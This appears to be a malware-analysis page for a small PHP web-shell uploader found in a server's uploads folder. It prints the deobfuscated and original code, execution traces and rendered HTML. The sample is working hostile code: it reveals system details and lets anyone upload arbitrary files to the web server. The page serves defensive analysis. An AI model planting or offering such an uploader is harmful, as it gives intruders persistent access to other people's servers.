hi.pHP, uploader.php, uploader.txt

md5: a6b7043572c4646c84bce7aea7709221

Jump to:

Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)

Screenshot
Attributes
Environment
php_uname (Deobfuscated, Original, Traces)

Files
copy (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_POST (Deobfuscated, Original)

Deobfuscated PHP code
<?php

echo '<pre>' . php_uname() . "\n" . '<br/><form method="post" enctype="multipart/form-data"><input type="file" name="__"><input name="_" type="submit" value="Upload"></form>';
if ($_POST) {
    if (@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])) {
        echo "OK";
    } else {
        echo "ER";
    }
}
Execution traces
data/traces/a6b7043572c4646c84bce7aea7709221_trace-1676239895.1336.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:12:01.031411]
1	0	1	0.000149	393528
1	3	0	0.000204	395624	{main}	1		/var/www/html/uploads/uploader.php	0	0
2	4	0	0.000220	395624	php_uname	0		/var/www/html/uploads/uploader.php	1	0
2	4	1	0.000234	395736
2	4	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1	3	1	0.000257	395624
			0.000283	314240
TRACE END   [2023-02-12 20:12:01.031577]

data/traces/a6b7043572c4646c84bce7aea7709221_trace-1676258950.5505.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:29:36.448330]
1	0	1	0.000168	393464
1	3	0	0.000225	395552	{main}	1		/var/www/html/uploads/hi.pHP	0	0
2	4	0	0.000241	395552	php_uname	0		/var/www/html/uploads/hi.pHP	1	0
2	4	1	0.000255	395664
2	4	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1	3	1	0.000278	395552
			0.000303	314200
TRACE END   [2023-02-13 01:29:36.448499]

Generated HTML code
<html><head></head><body><pre>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64
<br><form method="post" enctype="multipart/form-data"><input type="file" name="__"><input name="_" type="submit" value="Upload"></form></pre></body></html>
Original PHP code
<?php echo '<pre>'.php_uname()."\n".'<br/><form method="post" enctype="multipart/form-data"><input type="file" name="__"><input name="_" type="submit" value="Upload"></form>';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'OK';}else{echo 'ER';}}?>

PHP Malware Analysis

hi.pHP, uploader.php, uploader.txt

md5: a6b7043572c4646c84bce7aea7709221

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code